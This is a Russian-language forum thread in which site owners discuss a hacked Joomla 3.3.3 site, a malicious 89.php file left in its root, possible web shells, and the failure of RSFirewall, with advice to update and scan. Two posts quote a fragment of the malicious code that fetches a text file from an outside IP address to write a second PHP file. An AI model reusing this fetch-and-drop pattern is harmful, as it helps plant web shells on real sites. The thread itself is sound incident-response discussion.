Оставили подарок в корневом каталоге сайта

  • 11 Ответов
  • 409 Просмотров

0 Пользователей и 1 Гость просматривают эту тему.

*

likrion

  • Завсегдатай
  • *****
  • 753
  • 126
файл 89.php
Спойлер
[свернуть]

не забывайте обновлять систему
R331474010295

*

SeBun

  • Практически профи
  • *******
  • 3074
  • 186
  • @SeBun48
А шелл нашли, который этот файл создал?
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Администрирование | Разработка
Ник занят

*

draff

  • Практически профи
  • *******
  • 2739
  • 169
  • step by step
А этот файл 69.php на другом сервере ?
Код
http://85.185.123.123/images/.x/x.txt','./69.php'

*

flyingspook

  • Moderator
  • *****
  • 3609
  • 236
@likrion
он такой красивый должен быть не один
А этот файл 69.php на другом сервере ?
Код
http://85.185.123.123/images/.x/x.txt','./69.php'
скорей всего на том что и 89

*

likrion

  • Завсегдатай
  • *****
  • 753
  • 126
Спойлер
[свернуть]
R331474010295

*

wishlight

  • Профи
  • ********
  • 3593
  • 220
  • skype aqaus.com
Версия php какая?

Со второй строчки все плохое скорее всего.

Версии найденных CMS
Joomla v3.3.3

Обновляться надо. Как видим RSFirewall бесполезен.

*

likrion

  • Завсегдатай
  • *****
  • 753
  • 126
php 5.6.12, но сканировали сайт очень долго, на протяжении полугода....это первый взломанный у меня сайт..и наверное это станет сильным пинком для сознания онлайн firewall для сайтов..один неверный запрос и IP будет блокироваться на серверном уровне...надо уже прекращать этот бред и делать автоматику по сбору уязвимостей бессмысленной
« Последнее редактирование: 07.09.2016, 21:47:40 от likrion »
R331474010295

*

draff

  • Практически профи
  • *******
  • 2739
  • 169
  • step by step
Со второй строчки все плохое скорее всего.
Точнее не бывает, проверка на наличие определенного набора символов в запросе.
Сканер айболит запускался в параноидальном режиме?

*

likrion

  • Завсегдатай
  • *****
  • 753
  • 126
Точнее не бывает, проверка на наличие определенного набора символов в запросе.
Сканер айболит запускался в параноидальном режиме?
нет
R331474010295

*

likrion

  • Завсегдатай
  • *****
  • 753
  • 126
сайт.ру/libraries/library.php

Спойлер
[свернуть]
R331474010295

*

likrion

  • Завсегдатай
  • *****
  • 753
  • 126
сайт.ру/plugins/authentication/joomla/joomla.php

в шапке файла

Спойлер
[свернуть]

R331474010295

*

winstrool

  • Завсегдатай
  • *****
  • 758
  • 39
  • Свободен для работы
Как видим RSFirewall бесполезен.
Я еще примерно пол года назад, где то тут в темах скидывал моменты обхода этого фаервола, а те кто проливают шелы, у них подобные моменты на вооружения, тут постоянно следить за сайтом надо....
Вылечу ваш сайт от заразы!
Хочешь проверить свой самописный модуль на баги? пожалуйста! предварительно ознакомтесь с правилами!

Мониторинг обменных пунктов WebMoney по выгодным условиям